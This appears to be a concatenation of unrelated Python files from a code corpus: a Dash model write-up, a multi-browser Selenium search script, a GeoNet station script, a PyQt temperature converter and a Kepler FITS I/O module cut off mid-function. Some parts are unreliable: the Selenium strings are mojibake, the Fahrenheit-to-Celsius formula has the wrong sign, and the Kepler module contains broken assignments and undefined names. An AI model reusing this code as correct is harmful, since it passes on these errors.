To bring to life the time component of this data I created some new features that measured changes over time. One feature that proved
particularly useful for my model was how much Payroll increased year-over-year.
### Modeling
Before beginning to build and iterate on a model, I needed to decide what the target would be. Although the dataset came with a feature
for the growth rate of an industry in a given year, I decided to alter it and aim for predicting whether or not the industry would grow
in the coming year. I created a column that was True/False if the industry had grown, and the latest year of data I had was the target.
(If an industry had a 0% growth rate I counted that as False)
I split off and held out a test set, only manipulating it to engineer the same features as I did for the training set. The baseline model
to beat was 60%, being the accuracy you would get if you just guessed every industry in every state would **grow**. If my model couldn't do
significantly better than that, it wouldn't be very useful.
I used both a 3-way split and [cross-validation](https://jakevdp.github.io/PythonDataScienceHandbook/05.03-hyperparameters-and-model-validation.html)
to iterate on my model. The 3-way split I used for trying new model types and cross-validation I used for tuning the hyperparameters.
Right away I saw improvements over the baseline and it was the case here that more complex models did better. For the final
model I used all the features from the two previous years as well as the features I had engineered (which incorporated older
information as well). The best model for this problem was sciki-learn's [GradientBoostingClassifier](https://scikit-learn.org/stable/modules/generated/sklearn.ensemble.GradientBoostingClassifier.html)
and, with the right hyperparameters, I got an accuracy score of nearly 80%.
"""
),
html.Div(
html.Img(
src='assets/final_test_accuracy.png', className='img-fluid',
style={
'height': '50%',
'width': '50%'
}
),
style={'textAlign': 'center'}
),
html.Br(),
dcc.Markdown(
"""
In the bar plot below, we can see the 10 most important features in the model. To get a better sense of how different values
for each feature affect individual predictions, head over to [Insights](/insights) to zoom in on a few interesting predictions.
Or you can go to [Predictions](/predictions) to tune the features yourself and see what the model predicts!
"""
),
html.Div(
html.Img(
src='assets/feat_imps_label.png',
className='img-fluid'
),
style={'textAlign': 'center'}
),
],
)
layout = header, dbc.Row([column1]) |
12,972 | 73c03656e36f5e7cfee72f44de7ff27584169dec | from selenium import webdriver
from time import ctime, sleep
import threading
from selenium.webdriver.common.by import By
def browers_search(browername, keyword):
print("ๅฏๅจๆถ้ด๏ผ%s" % ctime())
print("ๆต่งๅจ้ฉฑๅจ๏ผ%s, ๆ็ดขๅ
ณ้ฎ่ฏ๏ผ%s" % (browername, keyword))
if browername == 'Chrome':
driver = webdriver.Chrome()
elif browername == 'FireFox':
driver = webdriver.Firefox()
elif browername == 'IE':
driver = webdriver.Ie()
else:
print("้ฉฑๅจๆ่ฏฏ๏ผไป
ๆฏๆChrome,FireFox,IE")
driver.maximize_window()
driver.implicitly_wait(10)
driver.get("https://www.baidu.com")
driver.find_element(By.ID, "kw").send_keys(keyword)
driver.find_element(By.ID, "su").click()
sleep(3)
driver.quit()
if __name__ == '__main__':
dicts = {'Chrome': 'selenium', 'FireFox': 'unittest', 'IE': 'python'}
threads = []
for browername, keyword in dicts.items():
t = threading.Thread(target=browers_search, args=(browername, keyword))
threads.append(t)
for i in range(len(threads)):
threads[i].start()
for i in range(len(threads)):
threads[i].join()
print("็ปๆๆถ้ด๏ผ%s" % ctime())
|
12,973 | 8640cfd9b63e759cfd37f23f116f48c7a1c0b16f | import os
from time import time
from geoNet import scrapeGeoNet as sg
from geoNet.gen_stats_kml import write_stats_kml
init_time = time()
# Firs get statsll dictionary by assigning lon, lat from the saved list known
# to be in WGS84 coordinates
fname = "ex_stats.ll"
loc_all_geoNet_stats = "/nesi/projects/nesi00213/StationInfo"
fname_all_geoNet_stats = "all_geoNet_stats+2016-12-20.ll"
loc_V1A = "/".join([os.getcwd(), "Vol1", "data"])
(event_stats1, fname_statsll) = sg.statsll_from_V1A_v2(
loc_all_geoNet_stats,
fname_all_geoNet_stats,
loc_V1A,
save_stats=False,
fname=fname,
loc=os.getcwd(),
)
# Now create another dictionary in which the lon, lat are read from .V1A files
# which may or may not be in WGS84 coordinates. Unless something goes wrong
# this should contain all the downloaded stations
# Note fname=None crashed
event_stats2, _ = sg.statsll_from_V1A(
loc_V1A, save_stats=False, fname=fname, loc=os.getcwd()
)
# Find stats that are in event_stat2 but not in event_stats1
stat_codes1 = set(event_stats1.keys())
stat_codes2 = set(event_stats2.keys())
# perform check
if not stat_codes1.issubset(stat_codes2):
print("Some station (lon, lat) were not read from .V1A files\n")
for stat_code in stat_codes2 - stat_codes1:
event_stats1[stat_code] = event_stats2[stat_code]
# write statsll for this event
with open("/".join([os.getcwd(), fname]), "w") as f:
for stat_code in event_stats1:
(lon, lat) = event_stats1[stat_code]
f.write("{:<15.4f} {:^15.4f} {:^10s} \n".format(lon, lat, stat_code))
# or use the convenience function
# write_statsll(loc, fname, event_stats1)
write_stats_kml(os.getcwd(), fname_statsll.split(".")[0] + ".kml", event_stats1)
final_time = time()
print("Done in {:10.1f} secs".format(final_time - init_time))
|
12,974 | 1647b8398d89b8adf1960dcd9f27d5ee39b7b6ab | import sys
from PyQt5.QtWidgets import *
from PyQt5.QtCore import *
from PyQt5.QtGui import *
def window():
app = QApplication(sys.argv)
win = QWidget()
grid = QGridLayout()
font = QFont()
font.setFamily("Arial")
font.setPointSize(14)
l2 = QLabel()
l2.setText("Fahrenheit")
l3 = QLabel()
l3.setText("Celsius")
l2.setFont(font)
l3.setFont(font)
fahrenheit = 32.00
celsius = 0.0
le1 = QLineEdit()
le1.setValidator(QDoubleValidator(0.99,99.99,2))
le1.setText(str(fahrenheit))
le2 = QLineEdit()
le2.setValidator(QDoubleValidator(0.99,99.99,2))
le2.setText(str(celsius))
b1 = QPushButton(">>>>")
b2 = QPushButton("<<<<")
def fahToCel(self):
inputvar = le1.text()
fahrenheit = float(inputvar)
newCelsius = (5/9)*(32-fahrenheit)
le2.setText(str(newCelsius))
return self
def celToFah(self):
inputvar1 = le2.text()
celsius = float(inputvar1)
newFahrenheit = (celsius*(9/5))+32
le1.setText(str(newFahrenheit))
return self
b1.clicked.connect(fahToCel)
b2.clicked.connect(celToFah)
grid.addWidget(l2,1,1)
grid.addWidget(l3,1,2)
grid.addWidget(le1,2,1)
grid.addWidget(le2,2,2)
grid.addWidget(b1,3,1)
grid.addWidget(b2,3,2)
win.setLayout(grid)
win.setGeometry(300,100,300,100)
win.setWindowTitle("Temperature Converter")
win.show()
sys.exit(app.exec_())
if __name__ == '__main__':
window() |
12,975 | eb64a57004355cc8fb2f7b4eb15899abfcb81705 | f = open('hightemp.txt','r')
f1 = open('hightemp1.txt','w')
for line in f:
f1.write(line.expandtabs(1))
f.close()
f1.close()
# cat hightemp.txt | tr '\t' ' '
|
12,976 | bd57201739478985b331be92ae603c2cac34834e | #!/usr/bin/env python
import kepmsg, kepkey
import sys, pyfits, tempfile, os, shutil, glob, numpy, warnings
# -----------------------------------------------------------
# delete a file
def delete(file,logfile,verbose):
status = 0
try:
os.remove(file)
except:
message = 'ERROR -- KEPIO.DELETE: could not delete ' + file
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# clobber a file
def clobber(file,logfile,verbose):
status = 0
if (os.path.isfile(file)):
try:
status = delete(file,logfile,verbose)
except:
message = 'ERROR -- KEPIO.CLOBBER: could not clobber ' + file
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# open ASCII file
def openascii(file,type,logfile,verbose):
status = 0
try:
content = open(file,type)
except:
message = 'ERROR -- KEPIO.OPENASCII: cannot open ASCII file ' + file
status = kepmsg.err(logfile,message,verbose)
return content, status
# -----------------------------------------------------------
# close ASCII file
def closeascii(file,logfile,verbose):
status = 0
try:
file.close()
except:
message = 'ERROR - KEPIO.CLOSEASCII: cannot close ASCII file ' + str(file)
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# split FITS filename and HDU number
def splitfits(file,logfile,verbose):
status = 0
file = file.strip()
if ('+' in file):
component = file.split('+')
filename = str(component[0])
hdu = int(component[1])
elif ('[' in file):
file = file.strip(']')
component = file.split('[')
filename = str(component[0])
hdu = int(component[1])
else:
message = 'ERROR -- KEPIO.SPLITFITS: cannot determine HDU number from name' + file
status = kepmsg.err(logfile,message,verbose)
return filename, hdu, status
# -----------------------------------------------------------
# open HDU structure
def openfits(file,mode,logfile,verbose):
status = 0
try:
struct = pyfits.open(file,mode=mode)
except:
message = 'ERROR -- KEPIO.OPENFITS: cannot open ' + file + ' as a FITS file'
status = kepmsg.err(logfile,message,verbose)
struct = None
return struct, status
# -----------------------------------------------------------
# close HDU structure
def closefits(struct,logfile,verbose):
status = 0
try:
struct.close()
except:
message = 'ERROR -- KEPIO.CLOSEFITS: cannot close HDU structure'
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# read FITS table HDU
def readfitstab(file,hdu,logfile,verbose):
status = 0
try:
with warnings.catch_warnings():
warnings.simplefilter('ignore')
table = hdu.data
except:
message = 'ERROR -- KEPIO.READFITSTAB: could not extract table from ' + file
status = kepmsg.err(logfile,message,verbose)
table = None
return table, status
# -----------------------------------------------------------
# read FITS table column
def readfitscol(file,table,column,logfile,verbose):
status = 0
try:
data = table.field(column)
except:
message = 'ERROR -- KEPIO.READFITSCOL: could not extract ' + column
message += ' data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read TIME column
def readtimecol(file,table,logfile,verbose):
status = 0
try:
data = table.field('TIME')
except:
try:
data = table.field('barytime')
if data[0] < 2.4e6 and data[0] > 1.0e4: data += 2.4e6
except:
message = 'ERROR -- KEPIO.READTIMECOL: could not extract'
message += ' time data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read FITS SAP column
def readsapcol(file,table,logfile,verbose):
status = 0
try:
data = table.field('SAP_FLUX')
except:
try:
data = table.field('ap_raw_flux')
except:
message = 'ERROR -- KEPIO.READSAPCOL: could not extract SAP flux'
message += ' time series data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read FITS SAP error column
def readsaperrcol(file,table,logfile,verbose):
status = 0
try:
data = table.field('SAP_FLUX_ERR')
except:
try:
data = table.field('ap_raw_err')
except:
message = 'ERROR -- KEPIO.READSAPERRCOL: could not extract SAP flux error'
message += ' time series data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read FITS PDC column
def readpdccol(file,table,logfile,verbose):
status = 0
try:
data = table.field('PDCSAP_FLUX')
except:
try:
data = table.field('ap_corr_flux')
except:
message = 'ERROR -- KEPIO.READPDCCOL: could not extract PDCSAP flux'
message += ' time series data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read FITS PDC error column
def readpdcerrcol(file,table,logfile,verbose):
status = 0
try:
data = table.field('PDCSAP_FLUX_ERR')
except:
try:
data = table.field('ap_corr_err')
except:
message = 'ERROR -- KEPIO.READPDCERRCOL: could not extract PDC flux error'
message += ' time series data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read FITS CBV column
def readcbvcol(file,table,logfile,verbose):
status = 0
try:
data = table.field('CBVSAP_FLUX')
except:
message = 'ERROR -- KEPIO.READCBVCOL: could not extract CBVSAP flux'
message += ' time series data from ' + file
status = kepmsg.err(logfile,message,verbose)
data = None
return data, status
# -----------------------------------------------------------
# read quality column
def readsapqualcol(file,table,logfile,verbose):
status = 0
try:
data = table.field('SAP_QUALITY')
except:
message = 'ERROR -- KEPIO.READSAPQUALCOL: could not extract SAP quality'
message += ' time series data from ' + file
status = kepmsg.err(logfile,message,verbose)
data, status = None
return data, status
# -----------------------------------------------------------
# read all columns within Kepler FITS light curve table
def readlctable(infile,instr,logfile,verbose):
status = 0
table = instr.data
barytime, status = readfitscol(infile,table,'barytime',logfile,verbose)
timcorr, status = readfitscol(infile,table,'timcorr',logfile,verbose)
cadence_number, status = readfitscol(infile,table,'cadence_number',logfile,verbose)
ap_cent_row, status = readfitscol(infile,table,'ap_cent_row',logfile,verbose)
ap_cent_r_err, status = readfitscol(infile,table,'ap_cent_r_err',logfile,verbose)
ap_cent_col, status = readfitscol(infile,table,'ap_cent_col',logfile,verbose)
ap_cent_c_err, status = readfitscol(infile,table,'ap_cent_c_err',logfile,verbose)
ap_raw_flux, status = readfitscol(infile,table,'ap_raw_flux',logfile,verbose)
ap_raw_err, status = readfitscol(infile,table,'ap_raw_err',logfile,verbose)
ap_corr_flux, status = readfitscol(infile,table,'ap_corr_flux',logfile,verbose)
ap_corr_err, status = readfitscol(infile,table,'ap_corr_err',logfile,verbose)
ap_ins_flux, status = readfitscol(infile,table,'ap_ins_flux',logfile,verbose)
ap_ins_err, status = readfitscol(infile,table,'ap_ins_err',logfile,verbose)
dia_raw_flux, status = readfitscol(infile,table,'dia_raw_flux',logfile,verbose)
dia_raw_err, status = readfitscol(infile,table,'dia_raw_err',logfile,verbose)
dia_corr_flux, status = readfitscol(infile,table,'dia_corr_flux',logfile,verbose)
dia_corr_err, status = readfitscol(infile,table,'dia_corr_err',logfile,verbose)
dia_ins_flux, status = readfitscol(infile,table,'dia_ins_flux',logfile,verbose)
dia_ins_err, status = readfitscol(infile,table,'dia_ins_err',logfile,verbose)
return [barytime, timcorr, cadence_number, ap_cent_row, ap_cent_r_err, \
ap_cent_col, ap_cent_c_err, ap_raw_flux, ap_raw_err, ap_corr_flux, \
ap_corr_err, ap_ins_flux, ap_ins_err, dia_raw_flux, dia_raw_err, \
dia_corr_flux, dia_corr_err, dia_ins_flux, dia_ins_err], status
# -----------------------------------------------------------
# append two table HDUs
def tabappend(hdu1,hdu2,logfile,verbose):
status = 0
nrows1 = hdu1.data.shape[0]
nrows2 = hdu2.data.shape[0]
nrows = nrows1 + nrows2
out = pyfits.new_table(hdu1.columns,nrows=nrows)
for name in hdu1.columns.names:
try:
out.data.field(name)[nrows1:] = hdu2.data.field(name)
except:
message = 'WARNING -- KEPIO.TABAPPEND: could not append column '
message += str(name)
status = kepmsg.warn(logfile,message,verbose)
return out, status
# -----------------------------------------------------------
# read image from HDU structure
def readimage(struct,hdu,logfile,verbose):
status = 0
try:
imagedata = struct[hdu].data
except:
message = 'ERROR -- KEPIO.READIMAGE: cannot read image data from HDU ' + str(hdu)
status = kepmsg.err(logfile,message,verbose)
return imagedata, status
# -----------------------------------------------------------
# write image to HDU structure
def writeimage(struct,hdu,imagedata,logfile,verbose):
status = 0
try:
struct[hdu].data = imagedata
except:
message = 'ERROR -- KEPIO.WRITEIMAGE: Cannot write image data to HDU ' + str(hdu)
status = kepmsg.err(logfile,message,verbose)
return struct, status
# -----------------------------------------------------------
# write new FITS file
def writefits(hdu,filename,clobber,logfile,verbose):
status = 0
if (os.path.isfile(filename) and clobber):
delete(filename,logfile,verbose)
try:
hdu.writeto(filename)
except:
message = 'ERROR -- KEPIO.WRITEFITS: Cannot create FITS file ' + filename
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# create a temporary file name
def tmpfile(path,suffix,logfile,verbose):
status = 0
try:
tempfile.tempdir = path
file = tempfile.mktemp() + suffix
except:
message = 'ERROR -- KEPIO.TMPFILE: Cannot create temporary file name'
status = kepmsg.err(logfile,message,verbose)
return file, status
# -----------------------------------------------------------
# create symbolic link
def symlink(infile,linkfile,clobber,logfile,verbose):
# delete file if one of the same name already exists
status = 0
if (os.path.exists(linkfile) and not clobber):
message = 'ERROR: KEPIO.SYMLINK -- file ' + linkfile + ' exists, use clobber'
status = kepmsg.err(logfile,message,verbose)
if (status == 0 and clobber):
try:
os.remove(linkfile)
except:
status = 0
# create symbolic link
if (status == 0):
try:
os.symlink(infile,linkfile)
except:
message = 'ERROR: KEPIO.SYMLINK -- could not create symbolic link from '
message += infile + ' to ' + linkfile
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# check that a file exists
def fileexists(file):
status = True
if not os.path.isfile(file):
status = False
return status
# -----------------------------------------------------------
# move file
def move(file1,file2,logfile,verbose):
status = 0
message = 'KEPIO.MOVE -- moved ' + file1 + ' to ' + file2
try:
shutil.move(file1,file2)
kepmsg.log(logfile,message,verbose)
except:
message = 'ERROR -- KEPIO.MOVE: Could not move ' + file1 + ' to ' + file2
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# copy file
def copy(file1,file2,logfile,verbose):
status = 0
message = 'KEPIO.COPY -- copied ' + file1 + ' to ' + file2
try:
shutil.copy2(file1,file2)
kepmsg.log(logfile,message,verbose)
except:
message = 'ERROR -- KEPIO.COPY: could not copy ' + file1 + ' to ' + file2
status = kepmsg.err(logfile,message,verbose)
return status
# -----------------------------------------------------------
# create a list from a file, string or wildcard
def parselist(inlist,logfile,verbose):
# test input name list
status = 0
inlist.strip()
if (len(inlist) == 0 or inlist.count(' ') > 0):
message = 'ERROR -- KEPIO.PARSELIST: list not specified'
status = kepmsg.err(logfile,message,verbose)
# test @filelist exists
if (inlist[0] == '@'):
infile = inlist.lstrip('@')
if not os.path.isfile(infile):
message = 'ERROR -- KEPIO.PARSELIST: input list '+infile+' does not exist'
status = kepmsg.err(logfile,message,verbose)
# parse wildcard and comma-separated lists
outlist = []
if (status == 0 and inlist[0] == '@'):
line = ' '
infile = open(inlist.lstrip('@'))
while line:
line = infile.readline()
if (len(line.strip()) > 0):
outlist.append(line.rstrip('\r\n'))
elif (status == 0 and inlist[0] != '@' and inlist.count('*') == 0):
if (inlist.count(',') == 0):
outlist.append(inlist)
else:
list = inlist.split(',')
for listitem in list:
outlist.append(listitem)
elif (status == 0 and inlist[0] != '@' and inlist.count('*') > 0):
outlist = glob.glob(inlist)
if (status == 0 and len(outlist) == 0):
message = 'ERROR -- KEPIO.PARSELIST: raw input image list is empty'
status = kepmsg.err(logfile,message,verbose)
return outlist, status
# -----------------------------------------------------------
# create a directory
def createdir(path,logfile,verbose):
status = 0
path = path.strip()
message = 'KEPIO.CREATEDIR -- Created directory ' + path
if (path[-1] != '/'): path += '/'
if (not os.path.exists(path)):
try:
os.mkdir(path)
kepmsg.log(logfile,message,verbose)
except:
message = 'ERROR -- KEPIO.CREATEDIR: Could not create '
message += 'directory ' + path
status = kepmsg.err(logfile,message,verbose)
else:
message = 'KEPIO.CREATEDIR -- ' + path + ' directory exists'
kepmsg.log(logfile,message,verbose)
return status
# -----------------------------------------------------------
# create a directory tree
def createtree(path,logfile,verbose):
status = 0
path = path.strip()
message = 'KEPIO.CREATETREE -- Created directory tree ' + path
if (path[-1] != '/'): path += '/'
if (not os.path.exists(path)):
try:
os.makedirs(path)
kepmsg.log(logfile,message,verbose)
except:
message = 'ERROR -- KEPIO.CREATETREE: Could not create '
message += 'directory tree ' + path
status = kepmsg.err(logfile,message,verbose)
else:
message = 'KEPIO.CREATETREE -- ' + path + ' directory exists'
kepmsg.log(logfile,message,verbose)
return status
# -----------------------------------------------------------
# number of HDU within a FITS structure
def HDUnum(struct):
ValidHDU = True
nhdu = 0
while ValidHDU:
try:
struct[nhdu].header[0]
nhdu += 1
except:
ValidHDU = False
return nhdu
# -----------------------------------------------------------
# read time ranges from ascii file
def timeranges(ranges,logfile,verbose):
status = 0; tstart = []; tstop = []
if '@' in ranges:
try:
lines, status = openascii(ranges[1:],'r',logfile,verbose)
except:
txt = 'ERROR -- KEPIO.TIMERANGES: cannot open file ' + ranges[1:]
status = kepmsg.err(logfile,txt,verbose)
return tstart, tstop, status
for line in lines:
line = line.strip().split(',')
if len(line) == 2:
try:
float(line[0])
float(line[1])
tstart.append(float(line[0]))
tstop.append(float(line[1]))
if tstart[-1] == 0.0 and tstop[-1] == 0.0: tstop[-1] = 1.0e8
except:
continue
status = closeascii(lines,logfile,verbose)
if len(tstart) == 0 or len(tstop) == 0 or len(tstart) != len(tstop) or status > 0:
txt = 'ERROR -- KEPIO.TIMERANGES: cannot understand content of ' + ranges[1:]
status = kepmsg.err(logfile,txt,verbose)
return tstart, tstop, status
else:
try:
ranges = ranges.strip().split(';')
for i in range(len(ranges)):
tstart.append(float(ranges[i].strip().split(',')[0]))
tstop.append(float(ranges[i].strip().split(',')[1]))
if tstart[-1] == 0.0 and tstop[-1] == 0.0: tstop[-1] = 1.0e8
except:
tstart = []; tstop = []
if len(tstart) == 0 or len(tstop) == 0 or len(tstart) != len(tstop) or status > 0:
txt = 'ERROR -- KEPIO.TIMERANGES: cannot understand time ranges provided'
status = kepmsg.err(logfile,txt,verbose)
return tstart, tstop, status
return tstart, tstop, status
## -----------------------------------------------------------
## manual calculation of median cadence within a time series
def cadence(instr,infile,logfile,verbose,status):
try:
intime = instr[1].data.field('barytime')
except:
intime, status = kepio.readfitscol(infile,instr[1].data,'time',logfile,verbose)
dt = []
for i in range(1,len(intime)):
if numpy.isfinite(intime[i]) and numpy.isfinite(intime[i-1]):
dt.append(intime[i] - intime[i-1])
dt = numpy.array(dt,dtype='float32')
cadnce = numpy.median(dt) * 86400.0
return intime[0], intime[-1], len(intime), cadnce, status
# -----------------------------------------------------------
# read time keywords
def timekeys(instr,file,logfile,verbose,status):
tstart = 0.0; tstop = 0.0; cadence = 0.0
# BJDREFI
try:
bjdrefi = instr[1].header['BJDREFI']
except:
bjdrefi = 0.0
# BJDREFF
try:
bjdreff = instr[1].header['BJDREFF']
except:
bjdreff = 0.0
bjdref = bjdrefi + bjdreff
# TSTART
try:
tstart = instr[1].header['TSTART']
except:
try:
tstart = instr[1].header['STARTBJD']
tstart += 2.4e6
except:
try:
tstart = instr[0].header['LC_START']
tstart += 2400000.5
except:
try:
tstart = instr[1].header['LC_START']
tstart += 2400000.5
except:
message = 'ERROR -- KEPIO.TIMEKEYS: Cannot find TSTART, STARTBJD or '
message += 'LC_START in ' + file
status = kepmsg.err(logfile,message,verbose)
tstart += bjdref
# TSTOP
try:
tstop = instr[1].header['TSTOP']
except:
try:
tstop = instr[1].header['ENDBJD']
tstop += 2.4e6
except:
try:
tstop = instr[0].header['LC_END']
tstop += 2400000.5
except:
try:
tstop = instr[1].header['LC_END']
tstop += 2400000.5
except:
message = 'ERROR -- KEPIO.TIMEKEYS: Cannot find TSTOP, STOPBJD or '
message += 'LC_STOP in ' + file
status = kepmsg.err(logfile,message,verbose)
tstop += bjdref
# OBSMODE
cadence = 1.0
try:
obsmode = instr[0].header['OBSMODE']
except:
try:
obsmode = instr[1].header['DATATYPE']
except:
message = 'ERROR -- KEPIO.TIMEKEYS: cannot find keyword OBSMODE '
message += 'or DATATYPE in ' + file
status = kepmsg.err(logfile,message,verbose)
if status == 0:
if 'short' in obsmode: # and bjdref == 0.0:
cadence = 54.1782
elif 'long' in obsmode: # and bjdref == 0.0:
cadence = 1625.35
return tstart, tstop, bjdref, cadence, status
# -----------------------------------------------------------
# filter input data table
def filterNaN(instr,datacol,outfile,logfile,verbose):
status = 0
try:
nanclean = instr[1].header['NANCLEAN']
except:
naxis2 = 0
for i in range(len(instr[1].columns.names)):
if 'time' in instr[1].columns.names[i].lower():
timecol = instr[1].columns.names[i]
try:
instr[1].data.field(datacol)
except:
msg = 'ERROR -- KEPIO.FILTERNAN: cannot find column ' + datacol + ' in the infile'
status = kepmsg.err(logfile,msg,verbose)
if status == 0:
try:
for i in range(len(instr[1].data.field(0))):
if str(instr[1].data.field(timecol)[i]) != '-inf' and \
str(instr[1].data.field(datacol)[i]) != '-inf':
instr[1].data[naxis2] = instr[1].data[i]
naxis2 += 1
instr[1].data = instr[1].data[:naxis2]
comment = 'NaN cadences removed from data'
status = kepkey.new('NANCLEAN',True,comment,instr[1],outfile,logfile,verbose)
except:
msg = 'ERROR -- KEPIO.FILTERNAN: Failed to filter NaNs from '+ outfile
status = kepmsg.err(logfile,msg,verbose)
return instr, status
# -----------------------------------------------------------
# read target pixel data file
def readTPF(infile,colname,logfile,verbose):
status = 0
tpf = pyfits.open(infile,mode='readonly',memmap=True)
if status == 0:
try:
naxis2 = tpf['TARGETTABLES'].header['NAXIS2']
except:
txt = 'ERROR -- KEPIO.READTPF: No NAXIS2 keyword in ' + infile + '[TARGETTABLES]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
kepid = tpf[0].header['KEPLERID']
kepid = str(kepid)
except:
txt = 'ERROR -- KEPIO.READTPF: No KEPLERID keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
channel = tpf[0].header['CHANNEL']
channel = str(channel)
except:
txt = 'ERROR -- KEPIO.READTPF: No CHANNEL keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
skygroup = tpf[0].header['SKYGROUP']
skygroup = str(skygroup)
except:
skygroup = '0'
if status == 0:
try:
module = tpf[0].header['MODULE']
module = str(module)
except:
txt = 'ERROR -- KEPIO.READTPF: No MODULE keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
output = tpf[0].header['OUTPUT']
output = str(output)
except:
txt = 'ERROR -- KEPIO.READTPF: No OUTPUT keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
quarter = tpf[0].header['QUARTER']
quarter = str(quarter)
except:
try:
quarter = tpf[0].header['CAMPAIGN']
quarter = str(quarter)
except:
txt = 'ERROR -- KEPIO.READTPF: No QUARTER or CAMPAIGN keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
season = tpf[0].header['SEASON']
season = str(season)
except:
season = '0'
if status == 0:
try:
ra = tpf[0].header['RA_OBJ']
ra = str(ra)
except:
txt = 'ERROR -- KEPIO.READTPF: No RA_OBJ keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
dec = tpf[0].header['DEC_OBJ']
dec = str(dec)
except:
txt = 'ERROR -- KEPIO.READTPF: No DEC_OBJ keyword in ' + infile + '[0]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
kepmag = tpf[0].header['KEPMAG']
kepmag = str(float(kepmag))
except:
kepmag = ''
if status == 0:
try:
tdim5 = tpf['TARGETTABLES'].header['TDIM5']
xdim = int(tdim5.strip().strip('(').strip(')').split(',')[0])
ydim = int(tdim5.strip().strip('(').strip(')').split(',')[1])
except:
txt = 'ERROR -- KEPIO.READTPF: Cannot read TDIM5 keyword in ' + infile + '[TARGETTABLES]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
crv5p1 = tpf['TARGETTABLES'].header['1CRV5P']
column = crv5p1
except:
txt = 'ERROR -- KEPIO.READTPF: Cannot read 1CRV5P keyword in ' + infile + '[TARGETTABLES]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
crv5p2 = tpf['TARGETTABLES'].header['2CRV5P']
row = crv5p2
except:
txt = 'ERROR -- KEPIO.READTPF: Cannot read 2CRV5P keyword in ' + infile + '[TARGETTABLES]'
status = kepmsg.err(logfile,txt,verbose)
# read and close TPF data pixel image
if status == 0:
try:
pixels = tpf['TARGETTABLES'].data.field(colname)[:]
except:
pixels = None
txt = '\nWARNING -- KEPIO.READTPF: Cannot read ' + colname + ' column in ' + infile + '[TARGETTABLES]'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
status = closefits(tpf,logfile,verbose)
# for STSCI_PYTHON v2.12 - convert 3D data array to 2D
if status == 0 and len(numpy.shape(pixels)) == 3:
isize = numpy.shape(pixels)[0]
jsize = numpy.shape(pixels)[1]
ksize = numpy.shape(pixels)[2]
pixels = numpy.reshape(pixels,(isize,jsize*ksize))
return kepid, channel, skygroup, module, output, quarter, season, \
ra, dec, column, row, kepmag, xdim, ydim, pixels, status
# -----------------------------------------------------------
# read target pixel mask data
def readMaskDefinition(infile,logfile,verbose):
status = 0
# open input file
inf, status = openfits(infile,'readonly',logfile,verbose)
# read bitmap image
if status == 0:
try:
img = inf['APERTURE'].data
except:
txt = 'WARNING -- KEPIO.READMASKDEFINITION: Cannot read mask defintion in ' + infile + '[APERTURE]'
kepwarn.err(txt,logfile)
status = 1
if status == 0:
try:
naxis1 = inf['APERTURE'].header['NAXIS1']
except:
txt = 'WARNING -- KEPIO.READMASKDEFINITION: Cannot read NAXIS1 keyword in ' + infile + '[APERTURE]'
kepwarn.err(txt,logfile)
status = 1
if status == 0:
try:
naxis2 = inf['APERTURE'].header['NAXIS2']
except:
txt = 'WARNING -- KEPIO.READMASKDEFINITION: Cannot read NAXIS2 keyword in ' + infile + '[APERTURE]'
kepwarn.err(txt,logfile)
status = 1
# read WCS keywords
if status == 0:
crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p, status = \
kepkey.getWCSp(infile,inf['APERTURE'],logfile,verbose)
if status == 0:
pixelcoord1 = numpy.zeros((naxis1,naxis2))
pixelcoord2 = numpy.zeros((naxis1,naxis2))
for j in range(naxis2):
for i in range(naxis1):
pixelcoord1[i,j] = kepkey.wcs(i,crpix1p,crval1p,cdelt1p)
pixelcoord2[i,j] = kepkey.wcs(j,crpix2p,crval2p,cdelt2p)
# close input file
if status == 0:
status = closefits(inf,logfile,verbose)
return img, pixelcoord1, pixelcoord2, status
# -----------------------------------------------------------
# read pixel response file
def readPRFimage(infile,hdu,logfile,verbose):
status = 0
# open input file
prf, status = openfits(infile,'readonly',logfile,verbose)
# read bitmap image
if status == 0:
try:
img = prf[hdu].data
except:
txt = 'ERROR -- KEPIO.READPRFIMAGE: Cannot read PRF image in ' + infile + '[' + str(hdu) + ']'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
naxis1 = prf[hdu].header['NAXIS1']
except:
txt = 'ERROR -- KEPIO.READPRFIMAGE: Cannot read NAXIS1 keyword in ' + infile + '[' + str(hdu) + ']'
status = kepmsg.err(logfile,txt,verbose)
if status == 0:
try:
naxis2 = prf[hdu].header['NAXIS2']
except:
txt = 'ERROR -- KEPIO.READPRFIMAGE: Cannot read NAXIS2 keyword in ' + infile + '[' + str(hdu) + ']'
status = kepmsg.err(logfile,txt,verbose)
# read WCS keywords
if status == 0:
crpix1p, crpix2p, crval1p, crval2p, cdelt1p, cdelt2p, status = \
